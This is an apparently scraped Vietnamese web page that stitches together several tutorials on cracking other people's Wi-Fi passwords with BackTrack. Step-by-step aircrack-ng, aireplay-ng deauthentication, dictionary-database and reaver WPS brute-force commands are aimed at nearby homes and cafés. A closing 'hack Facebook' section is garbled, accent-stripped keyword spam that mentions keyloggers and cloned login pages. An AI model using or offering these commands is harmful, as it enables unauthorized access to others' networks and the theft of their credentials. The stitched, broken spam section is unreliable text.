Xem Nhiều 12/2022 #️ Hướng Dẫn Hack Wifi Bằng Backtrack Từ A / 2023 # Top 13 Trend | Karefresh.com

Xem Nhiều 12/2022 # Hướng Dẫn Hack Wifi Bằng Backtrack Từ A / 2023 # Top 13 Trend

Cập nhật thông tin chi tiết về Hướng Dẫn Hack Wifi Bằng Backtrack Từ A / 2023 mới nhất trên website Karefresh.com. Hy vọng nội dung bài viết sẽ đáp ứng được nhu cầu của bạn, chúng tôi sẽ thường xuyên cập nhật mới nội dung để bạn nhận được thông tin nhanh chóng và chính xác nhất.

2.Các bước cơ bản trong khi hacka. Chuyển card wireless về chế độ monitor(tức là chế độ nghe ngóng tín hiệu)b. Scan mạng wireless và bắt dữ liệu từ APc. Bắt 4-way handshake(cái này sẽ xuất hiện khi máy hacker đã bắt tay được với AP)d. Dùng Aircrack-ng kết hợp database để dò crack

B.THỰC HIỆN1. Xem interface của card mạngDùng lệnh: iwcofig để xem có những card mạng nào trong máy, thường là eth0 và wlan0(chúng ta sẽ dùng wlan0)

2. Chuyển wlan0 về chế độ nghe ngóngDùng lệnh: airmon-ng wlan0 start. Lệnh này sẽ tạo ra một card wireless ảo là mon0

3. Scan mạng wireless trong vùng bắt sóngDùng lệnh: airodump-ng wlan0(mon0) để bắt sóng wifi. Ở đây bạn có thể làm trên SHELL mới hoặc làm trực tiếp trên SHELL cũ cũng được.

Có những lưu ý ở đây các bạn nên nắm rõ:BSSID: Chính là MAC của AP cần hackPWR: Càng cao càng tốt nhưng đa số nó ở chỉ số âm(-xx)#Data: Dữ liệu càng cao càng tốt#/s: Tốc độ kết nối càng cao càng tốtCH: Kênh kết nối, nên lưu ýENC: Bảo mật theo giao thức nào đó WEP, WPA, WPA2,…CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,…AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,…ESSID: tên của AP, nếu AP đang ẩn tên thì nó sẽ có dạng STATION: MAC của Client đang kết nối tới AP

4. Tiến hành bắt gói tinDùng lệnh: airodump-ng -c x –bssid -w chúng tôi wlan0Với: x: tức là kênh kết nối của AP cần hackMAC AP: MAC của AP cần hack-w: tức là lệnh writeÝ nghĩa của dòng lệnh này là: Chúng ta sẽ bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một file tên là wpa.cap(cái này thích tên gì cũng được)

5. Tiến hành bắt tay với AP(nên làm trên SHELL mới) Dùng lệnh: aireplay-ng -1 0 -a -c wlan0

Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa 4-way handshake đến AP, trong gói tin đó chưa password(đã được hash) của mạng. Để được password ta phải có gói tin trên. Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực: chú ý dòng STATION, là nó đó Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải gửi gói tin chứa 4-wayhandshake để yêu cầu kết nối lại. Khi đó máy của hacker ta sẽ bắt được gói tin

Có một vài lưu ý ở đây

a. Khi bắt tay được với AP mình sẽ ghi lại những gói IV. Vậy IV là gìWEP hay WPA sử dụng một vector khởi tạo (Initialization Vector – IV) cùng với khóa được chia sẽ (“shared-secret”) được người dùng nhập vào để tạo ra một mã khóa RC4 nhằm mục đích mã hóa các gói dữ liệu. Vì những lý do về cấu trúc kỹ thuật mà WEP, WPA có thể bị crack thông qua việc sử dụng các IV. Với một khóa WEP thì cỡ 5000 IVs

b. Với Aircrack-ng v1.0 thì để hack một khóa WEP 64b ta cần đọc cỡ 20.000 gói tin và 40.000 với WEP 128b. Cái này càng nhiều thì càng dễ tìm khóa.

c.Khi bạn dùng Aireplay mà thấy gói tin gởi đi mà không có trả lời(ACK) thì mình phải chuyển sang STATION khác và áp dụng tương tự.

d.Bạn có thể dùng lệnh : aireplay-ng –help để đọc kĩ hướng dẫn

e.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì móm rồi.

f. Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC AP(BSSID), quá xa, không có Client nào đang kết nối với AP

6.Tạo cơ sở dữ liệu(phần này chua nè)Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực chất việc dò password là so sánh gói tin với list pass có sẵn trong máy

Dùng lệnh theo thứ tự:-airolib-ng crackwpa import essid chúng tôi Mình dùng lệnh này để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file chúng tôi mình đã tạo sẵn(Mục này rất hay các bạn nên tìm hiểu)

-airolib-ng crackwpa import passwd /đường dẫn tời file chúng tôi (Mục này các bạn cũng nên tìm hiểu để hiểu vấn đề và nhớ lâu hơn)

-airolib-ng crackwpa –batch: Kết hợp essid với password

-airolib-ng crackwpa stats: kiểm tra tính hợp lệ

7.Crack wifi thôi nào-aircrack-ng -a 1 wpa*.cap : Đọc những gì có trong file wpa.cap

Chú ý: *: toàn bộ file nào có tên chúng tôi là đọc hết(làm sẽ hiểu tại sao có dấu *)1: Crack WEP, 2 thì crack WPAHe he, cách này thì crack WEP còn lâu chứ crack WPA tới mùa quýt năm sau. Vì cách này thì đọc những gì có trong file wpa thôi. Hên xui thì ra.

Bây giờ là lúc CSDL ra tay nè-aircrack-ng -r crackwpa wpa*.capÝ nghĩa: Đọc và so sánh file wpa và file crackwpa. Vì lúc nãy ta đã import pass và essid vào crackwpa roài nên giờ 2 thằng đó chạy và so sánh nhau tới bao giờ trùng kết quả thì xuất ra màn hình thôi. Tốc độ sẽ nhanh hơn rất nhiều so với đọc file thô wpa.cap.

Lưu ý: Bắt được càng nhiều IV càng tốt, crack WEP còn dễ chứ WPA thì chua lắm tại vị từ điển nó là tiếng tây còn bác admin nào mà đặt là “kut3ilov3you$%^” thì khỏi ra luôn. Có nhiều kĩ thuật được áp dụng khi crack đó là tùy vào trình của người crack. Và crack chỉ để học hỏi không phải đi chôm mạng người khác. Mình đã hack được thực tế 4 cái AP với giao thức WEP còn WPA thì ngay cái router của nhà mình cũng bó tay .Xin gửi mọi người 2 video tạo database và hack. Nguồn bài viết là do em thao khảo và mày mò làm rồi chia sẻ kinh nghiệm, xin các bác đừng chém, bài viết hơi dài lại viết trong lúc đang có tí men nên có thể có sai sót, chỗ nào sai chém mái thoải để em sửa.Video: Xem cái này cùng đọc bài của em để hiểu rõ vấn đề

Code: http://www.mediafire.com/?orjaexgnsig78un (tao database)http://www.mediafire.com/?u2dxr01u2dtzogd (hack chơi )

Hack Wifi Wpa Với Backtrack 5 / 2023

Các bước tiến hành như sau :1, bật 1 cửa sổ lệnh và gõ :iwconfig (cái này để xem các card trong máy).airmon-ng ( để xem máy mình có card wifi hỗ trợ trong Backtrack ?).Nếu không có thì thôi,khỏi hack lun.airmon-ng stop wlan0 (interface của card tương thích hiện ra trong lệnh airmon-ng trên).ifconfig wlan0 donw (không có bước này thì không chạy được đâu nhá!).ifconfig wlan0 upairmon-ng start wlan0airodump-ng mon0 ( mon0 là monitor interface của wlan0 sau khi thực hiện lệnh airmon-ng start wlan0).2, mở 1 của sổ lệnh khác gõ :airodump-ng –bssid BSSID -w wpafile -c CH mon0

( BSSID là MAC tương ứng với wifi mình định hack,hiên ra ở bảng airodump-ng mon0.

wpafile là tên 1 file mình đặt để nó tạo ra file .cap cho mình.

CH là channel tương ứng với cột CH hiện ra ở bảng airodump-ng mon0 của wifi mình định hack.

aireplay-ng –deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục).3. Chuyển sang cửa sổ của lệnh airodump-ng mon0,chờ đến khi xuất hiện dòng WPA handshake thì dừng lại bằng cách ấn CTRL +C.rồi gõ lệnh :aircrack-ng -w /đường dẫn đến file passwordlist/password.lst /đường dẫn đến file chúng tôi (thường là chúng tôi ;wpafile chính là tên tương ứng với lên airodump ở trên ;password.lst là file có chứa từ điển pass , mình phải download trên mạng về,có thể là file .text hoặc .dic) Bây giờ ngồi chờ báo KEY FOUND thôi. :d. Tuy nhiên cách này rất lâu, chỉ dò được khoảng 900key/s. Có cách khác nhanh hơn có thể dò được khoảng 30000-40000key/s .Đó là tạo database cho Backtrack.Làm như sau : – Các bạn mở thêm 1 cửa sổ lệnh khác, gõ :airolib-ng crackwpa –import essid /đường dẫn/essid.txt (essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack ; crackwpa là tên database mà mình sẽ tạo ra).airolib-ng crackwpa –import passwd /đường dẫn/password.lst airolib-ng crackwpa –batch ( kết hợp essid và chúng tôi , sẽ phải đợi hơi lâu để hoàn thành).

aircrack-ng -r crackwpa wpa*.cap (bây giờ tốc độ dò lên đến 30000k/s ). :d

Cái này phải phụ thuộc rất nhiều vào file chúng tôi ,nếu nó không chứa pass của wifi thì chịu chết k hack được.

Link download Back Track 5 R2 Chú ý : Để log vào giao diện của BT5 gõ : startx

Hack Pass Wifi Wpa/Wpa2 Với Backtrack 5 R3 / 2023

Hack wifi không phải là vấn đề mới mẻ bởi nhu cầu người dùng tìm kiếm khá nhiều. Tuy nhiên các phần mềm, công cụ chạy trên hệ điều hành Windows thì khả năng dò chính xác pass wifi lại khá hiếm nếu như không nói là không thể. Nó chỉ hên xui hack mật khẩu mã hóa theo cơ chế cũ. Việc hack pass WiFi WPA/WPA2 không phải là vấn đề đơn giản hay chỉ vài nhấp chuột là xong. Bởi vậy mà cụm từ hack wifi với backtrack được người dùng lựa chọn và hiệu quả cao hơn hẳn. Phiên bản mới nhất là BackTrack 5 R3. Vậy cách bước thực hiện như thế nào để dò được mật khẩu mạng không dây wifi ?. Nội dung bài viết tối ngày hôm nay mình sẽ đề cập tới cho các bạn tham khảo, áp dụng vào trường hợp cụ thể.

Mình sẽ đi thẳng vào vấn đề, không dài dòng cũng như giới thiệu không đâu, bởi bạn có lẽ đang hồi hộp để làm theo các bước hướng dẫn đúng không nào ?.

Hack pass WiFi WPA/WPA2 bằng hệ điều hành BackTrack 5 R3

1. Chuẩn bị đồ nghề

Download phiên bản BackTrack 5 R3: Link Torrent – Link ISO – Bạn xem tải kiểu nào tốc độ nhanh thì dùng.

Sử dụng Rufus để tạo usb boot – Tải về Tại đây

2. Tiến hành hack wifi WPA/WPA2 với Backtrack 5 R3

Để vào giao diện đồ họa thì tại màn hình root ban đầu, bạn nhập: startx rồi nhấn Enter. Tiếp theo, bạn nhấn Ctrl+Alt+T để mở cửa sổ dòng lệnh Terminal.

Để kích hoạt card mạng WiFi, bạn nhập lệnh: airmon-ng start wlan0 rồi nhấn Enter

Bước kế tiếp, bạn nhập lệnh: airodump-ng mon0 và nhấn Enter để tìm SSID hay tên mạng wifi.

Ngay lập tức nó sẽ dò toàn bộ các mạng WiFi xung quanh bạn trong phạm vi nó hỗ trợ. Cho dù là hộ gia đình, nhà hàng, quán cà phê… Miễn có mạng wifi là nó đều quét ra. bạn copy SSID mà bạn muốn hack pass wifi wpa, wpa2 như hình:

Việc cần làm tiếp theo, bạn nhập lệnh: reaver -i mon0 -b SSID -vv. Trong đó:

SSID: Thông số bạn Copy ở bước trên

Ngay sau đó nó tự dò tìm mã pin, mã psk

Thời gian dò tìm pass wifi wpa, wpa2 có thể lên tới 9h hoặc ít hơn tùy thuộc vào cấu hình máy tính của bạn, độ khó mà mạng wifi họ đặt.

Hack pass WiFi WPA/WPA2 với BackTrack 5 R3 Filed in: Tags: Thủ thuật, Backtrack, Wifi Thủ thuật Internet

Huong Dan Hack Facebook Bang Backtrack 5 / 2023

Huong Dan Hack Facebook Bang Backtrack 5

Huong Dan Hack Facebook Bang Backtrack 5

Join or Log Into Facebook Email or Phone. . Em s hng dn mi ngi hack wifi bng cng c fernder c sn trong BackTrack 5 R3.. Hng dn Hack wifi WEP, WPA vi Wifiway . 5: cui cng l . Cho mng bn n vi Backtrack, .. Theo nh bi hng dn hack wifi wpa/wpa2 bng reaver trong Backtrack k trc, ln ny mnh s hng dn cc bn hack wifi bng cng .. Hng dn hack pass wifi bng backtrack 5 v cch phng chng. Hack password wifi hng xm d dng.. Huong dan minh voi. Xa. . ( khoang 80 gb), the nhung viec tim pass bang aircrack toc to cham qua .. Hack ti khon FaceBook v Gmail s dng BackTrack 5 Trong hng dn trc y ca ti, ti gii thch: Lm th no hack .. Backtrack5 l hh tch hp cc cng c rt mnh cho 1 hacker nn hm nay mnh s hng dn cc bn ci backtrack 5 bng liveusb.. Cch hack mt khu wifi bo mt wep bng phn mm backtrack 5. mi chi tit xin xem thm ti y .. Install Backtrack 5 R3 by USB Boot. Tho lun trong ‘H iu hnh’ ang xem ch ny .. Hng dn ci Backtrack 5R1 BackTrack Linux Penetration Testing Distribution – AnoVn.Zoom. MidwayUSA is a privately held American retailer of various hunting and outdoor-related products.. Trong bi trc mnh c hng dn dng backtrack 5 hack mt khu wifi b con nh mnh ang c thc mc dng g chy c .. Backtrack 6 m hiu l Kali Linux ra i, . ng nhp bng Facebook . Download Backtrack 6 (Kali Linux) – Hack mt khu wifi.. Tin hnh hack wifi WPA/WPA2 vi Backtrack 5 R3. . Chia s cho bn b qua Facebook, . ban huong dan chi tiet hon ve phan men kalilinux dc ko tien nguyen .. . bang cach go wifite tu command line . . backtrack hack password wifi kali linux.. Theo nh bi hng dn hack wifi wpa/wpa2 bng reaver trong Backtrack k trc, ln ny mnh s hng dn cc bn hack wifi bng cng .. vui v, ha ng, thch kt bn.c tinh thn trch nhim trong cng vic v gia nh View my complete profile. Hack pass WiFi WPA/WPA2 vi BackTrack 5 R3 ; .. Hm nay mnh s vit bi hng dn ci backtrack 5r3 cho . LIKE Trang Chnh FACEBOOK. . Cheat Engine 6.4 Phn mm hack game .. iCon Facebook; Din n; My . Xin hi v BackTrack 5 r3 hack . ny v c li. v li video huong dan ci at bang wmware trn my o nn .. Mnh s dng Backtrack 5 r2 v thnh cng vi . cng c 15 ci wifi,nhng c enable WPS ln th ch c 4 ,5 ci v hack c ch .. iCon Facebook; Din n; My . Xin hi v BackTrack 5 r3 hack . ny v c li. v li video huong dan ci at bang wmware trn my o nn .. Huong dan hack wifi bang backtrack, hng dn boot file back track rar , hack wifi bng hirenboot, www chúng tôi .. huong dan crack wifi bang backtrack 5 trong vmware, . huong dan sua loi backtrack 5 hack wifi, . Facebook; Quyn vit bi .. Hng dn cch hack pass wifi n gin. . Mnh s dng Backtrack 5 r2 v thnh cng vi WPA2 c s dng WPS .. Facebook. Email or Phone: Password: Forgot account? Sign Up. Notice. You must log in to continue. Log into Facebook. Log In. Forgot account? Create New Account .. Huong dan backtrack 1. Nhng trang web u tin dy v hack mng wifi dng kha WEP xut hin t cch ykhong hn 2 .. Hng dn lm USB hack WiFi . i vi Backtrack 5, . Chia s ln Twitter Chia s ln Facebook.. Hng dn hack pass Wifi bng BackTrack 5 Hng dn Hack Wifi vi card wireless 4965AGNVi dng tm s:Thi gian gn y area ko c iu .. Hack Facebook, Gmail bng Backtrack 5 R3 In “Hack” Hng dn ci t v s dng keyloger In “Hack” . bai viet nay huong dan don gian, .. Hng dn cch hack pass wifi bng phn mm BackTrack 5. . huong dan hack wifi; phn mm . Cch vo facebook khi b chn mi nht bng .. Tai lieu huongdansudungbacktrack52524 . nh .Trong ngh thut hack khng c ci . clone 1 trang ca Facebook cho phn hng .. Facebook: . “hack wifi wpa” “hack wifi wpa2” “hack wifi wps 1.0” “hack wifi wifislax” “hack wifi backtrack” “hack wifi linux” “hack wifi wps 1.0 .. Ai ma cha may doc thi chiu kho dich nha Mac du tren mang co mot so trang da huong dan nhung sau mot so hom tim hi .. Share on Facebook. Tweet on Twitter . Bc 5: sau chng ta . 8 Bnh lun on “Hng dn chi tit Hack Wifi bng Wifislax vi USB mi .. Install backtrack 5 r3 on vmware – Huong dan cai dat Backtrack 5r3 len may ao vmware . s dng usb chy backtrack 5 cng c hack . chúng tôi . cab74736fa

Bạn đang xem bài viết Hướng Dẫn Hack Wifi Bằng Backtrack Từ A / 2023 trên website Karefresh.com. Hy vọng những thông tin mà chúng tôi đã chia sẻ là hữu ích với bạn. Nếu nội dung hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!